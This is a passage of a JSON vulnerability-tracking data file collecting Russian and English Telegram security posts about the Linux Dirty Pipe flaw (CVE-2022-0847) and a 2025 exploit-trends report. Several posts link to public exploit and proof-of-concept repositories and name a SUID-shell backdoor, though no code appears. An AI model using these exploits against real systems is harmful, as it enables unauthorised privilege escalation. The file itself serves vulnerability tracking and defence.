\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0441\u0430\u043c\u0443\u044e \u043e\u043f\u0430\u0441\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u044f\u0434\u0440\u0430 Linux \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0433\u043e\u0434\u044b (CVE-2022-0847). Dirty Pipe \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u043b\u044e\u0431\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0440\u0430\u0437\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0434\u043b\u044f \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e, \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u043b\u044f \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u0438 \u0434\u0432\u043e\u0438\u0447\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u0441\u043b\u0443\u0436\u0431\u0430\u043c\u0438 \u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c\u0438.  \n \n\u0418\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0438 \u043d\u0430\u0434 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u043e\u0439 \u0441 \u043f\u0435\u0440\u0438\u043e\u0434\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435\u043c \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u044b\u0445 \u043f\u043e \u0441\u0435\u0442\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u0430 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Linux. \u0412 \u0438\u0442\u043e\u0433\u0435 \u043e\u043d\u0438 \u043f\u043e\u043d\u044f\u043b\u0438, \u0447\u0442\u043e \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0438\u0437-\u0437\u0430 \u043e\u0448\u0438\u0431\u043a\u0438 \u044f\u0434\u0440\u0430 Linux.\n\n#Linux #\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c", "creation_timestamp": "2022-03-09T10:51:20.000000Z"}, {"uuid": "c1ef4b6f-da56-4293-be58-ed0e09977710", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/true_secator/7370", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u041b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 \u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u0433\u043e\u0442\u043e\u0432\u0438\u0442\u044c \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0443 \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0439 \u043e\u0442\u0447\u0435\u0442 \u0437\u0430 2 \u043a\u0432\u0430\u0440\u0442\u0430\u043b 2025 \u0433\u043e\u0434\u0430.\n\n\u0420\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u0432\u043e \u0432\u0442\u043e\u0440\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430 \u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0432\u0435\u0441\u044c\u043c\u0430 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u043d\u043e\u0439.\n\n\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0442 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0441\u0435\u0445 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430: UEFI, \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u0432, \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c, \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439. \n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043d\u0430\u0448\u0435\u043c\u0443 \u0430\u043d\u0430\u043b\u0438\u0437\u0443, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438, \u043a\u0430\u043a \u0438 \u0432 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u043f\u0435\u0440\u0438\u043e\u0434\u044b,\u00a0\u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u043c \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c.\n\n\u0412\u043e \u0432\u0442\u043e\u0440\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430, \u043a\u0430\u043a \u0438 \u043f\u0440\u0435\u0436\u0434\u0435, \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u043c\u0438 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u0431\u044b\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Microsoft Office, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\n\u0420\u0435\u0448\u0435\u043d\u0438\u044f \u041b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 \u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u043e\u0433\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 \u0437\u0430\u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u044c\u0448\u0435\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u043d\u0430 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 Windows \u0434\u043b\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439: CVE-2018-0802 (RCE\u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 Equation Editor), CVE-2017-11882 (\u0435\u0449\u0435 \u043e\u0434\u043d\u0430 RCE \u0432 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u0435 \u0444\u043e\u0440\u043c\u0443\u043b), CVE-2017-0199 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Microsoft Office \u0438 WordPad, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439).\n\n\u0414\u0430\u043b\u0435\u0435 \u0441\u043b\u0435\u0434\u0443\u044e\u0442 \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 WinRAR \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b \u0434\u043b\u044f \u043a\u0440\u0430\u0436\u0438 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 NetNTLM \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows: CVE-2023-38831 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 WinRAR), CVE-2025-24071 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0432\u043e\u0434\u043d\u0438\u043a\u0430 Windows) \u0438 CVE-2024-35250 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u00a0ks.sys).\n\n\u0414\u043b\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Linux \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0447\u0430\u0441\u0442\u043e \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b \u0434\u043b\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439: CVE-2022-0847 (\u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a Dirty Pipe), CVE-2019-13272 (EoP-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0432\u044b\u0437\u0432\u0430\u043d\u043d\u0430\u044f \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u043e\u0439 \u043d\u0430\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439) \u0438 CVE-2021-22555 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u0443\u0447\u0438 \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u044f\u0434\u0440\u0430 Netfilter).\n\n\u0412\u043e \u0432\u0442\u043e\u0440\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430 \u043c\u044b \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0440\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u043f\u043e \u0442\u0438\u043f\u0430\u043c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u043b\u043e \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u0438 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 \u0442\u0430\u043a\u0436\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0432 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430\u0445 C2 (Sliver, Metasploit, Havoc \u0438 Brute Ratel C4) \u0432 \u043f\u0435\u0440\u0432\u043e\u0439 \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0435 2025 \u0433\u043e\u0434\u0430.\n\n\u041f\u043e\u0441\u043b\u0435 \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432 \u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043e\u0431\u0440\u0430\u0437\u0446\u043e\u0432 \u0430\u0433\u0435\u043d\u0442\u043e\u0432 C2, \u0432 \u041b\u041a \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438 \u0432 APT-\u0430\u0442\u0430\u043a\u0430\u0445 \u0441 \u0443\u0447\u0430\u0441\u0442\u0438\u0435\u043c \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0445 \u0432\u044b\u0448\u0435 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u043e\u0432 C2 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438:\n\n- CVE-2025-31324 \u0432 SAP NetWeaver Visual Composer Metadata Uploader: \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0438 \u0438\u043c\u0435\u0435\u0442 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 10,0.\n\n- CVE-2024-1709 \u0432 ConnectWise ScreenConnect 23.9.7: \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043e\u0431\u0445\u043e\u0434\u0443 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 10,0.\n\n- CVE-2024-31839, XSS-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f CHAOS v5.0.1: \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a EoP.\n\n- CVE-2024-30850, RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 CHAOS v5.0.1: \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0431\u043e\u0439\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e.\n\n- CVE-2025-33053: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0432\u044b\u0437\u0432\u0430\u043d\u043d\u0430\u044f \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u043e\u0439 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u0440\u0430\u0431\u043e\u0447\u0435\u0433\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430 \u0434\u043b\u044f LNK-\u0444\u0430\u0439\u043b\u043e\u0432 \u0432 Windows: \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430.\n\n\u0427\u0435\u0442\u043a\u0430\u044f \u0438\u043d\u0444\u043e\u0433\u0440\u0430\u0444\u0438\u043a\u0430, \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u044c\u043d\u044b\u0439 TOP 10 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439\u00a0\u0438 \u0440\u0430\u0437\u0431\u043e\u0440 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0437\u043d\u0430\u0447\u0438\u043c\u044b\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0432\u043e \u0432\u0442\u043e\u0440\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430 - \u0432 \u043e\u0442\u0447\u0435\u0442\u0435.", "creation_timestamp": "2025-08-27T15:30:05.000000Z"}, {"uuid": "694d3151-ca11-4151-8c13-9e25bac11a90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/poxek/1258", "content": "pwncat_dirtypipe\n\u041c\u043e\u0434\u0443\u043b\u044c \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-0847 (dirtypipe)\nhttps://github.com/DanaEpp/pwncat_dirtypipe\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-04-08T10:01:06.000000Z"}, {"uuid": "4eacbe55-898a-490a-bdaf-8eea6717317b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/poxek/1019", "content": "Dirty Pipe Vulnerability CVE-2022-0847 \u0438\u043b\u0438 \u043a\u0430\u043a \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043b\u044e\u0431\u043e\u0439 \u0444\u0430\u0439\u043b \u0432 Linux \u043e\u0442 \u043f\u0440\u0430\u0432 \u043d\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\nhttps://github.com/antx-code/CVE-2022-0847\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u044f\u0434\u0440\u0435 Linux \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u0432\u0435\u0440\u0441\u0438\u0438 5.8, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f. \u042d\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u043c\u043e\u0433\u0443\u0442 \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u043a\u043e\u0434 \u0432 root \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b.\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 ru\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 eng\n\u0412\u0438\u0434\u0435\u043e\nhttps://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker\n \nMITRE\nDebian Security Tracker\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1\ufe0f", "creation_timestamp": "2022-03-09T14:02:03.000000Z"}, {"uuid": "0b21b0c4-0695-4cc8-9040-bd2c34a64c5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/poxek/1049", "content": "P.S. \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0435\u0449\u0451 \u043f\u043e \u044d\u0442\u043e\u0439 CVE\nDirty Pipe - CVE-2022-0847 - Linux Privilege Escalation\nhttps://www.youtube.com/watch?v=af0PGYaqIWA\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1\ufe0f", "creation_timestamp": "2022-03-15T07:32:37.000000Z"}, {"uuid": "9e2b8503-aca8-40bd-8bbd-ee3415448f76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/ptswarm/112", "content": "The Dirty Pipe Vulnerability\n\n\ud83d\udc64 by Max Kellermann\n\nThis is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.\nIt is similar to\u00a0CVE-2016-5195 \u201cDirty Cow\u201d\u00a0but is easier to exploit.\nThe vulnerability\u00a0was fixed\u00a0in Linux 5.16.11, 5.15.25 and 5.10.102.\n\n\n\ud83d\udcdd Contents: \n\u2022 Abstract\n\u2022 Corruption pt. I\n\u2022 Access Logging\n\u2022 Corruption pt. II\n\u2022 Corruption pt. III\n\u2022 Man staring at code\n\u2022 Man staring at kernel code\n\u2022 Pipes and Buffers and Pages\n\u2022 Uninitialized\n\u2022 Corruption pt. IV\n\u2022 Exploiting\n\u2022 Timeline\n\nhttps://dirtypipe.cm4all.com", "creation_timestamp": "2022-03-08T11:14:13.000000Z"}, {"uuid": "50e15aed-0986-49af-a02f-cce2fd36b4e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2049", "content": "CVE-2022-0847 SUID Shell Backdoor", "creation_timestamp": "2022-07-20T11:15:32.000000Z"}, {"uuid": "e2507c95-20b7-4fce-aaf9-dc626999870b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/poxek/2297", "content": "CVE-2022-0847 aka Dirty Pipe vulnerability in Linux kernel\n\n\u041d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u041c\u0430\u043a\u0441 \u041a\u0435\u043b\u043b\u0435\u0440\u043c\u0430\u043d\u043d \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0432 \u044f\u0434\u0440\u0435 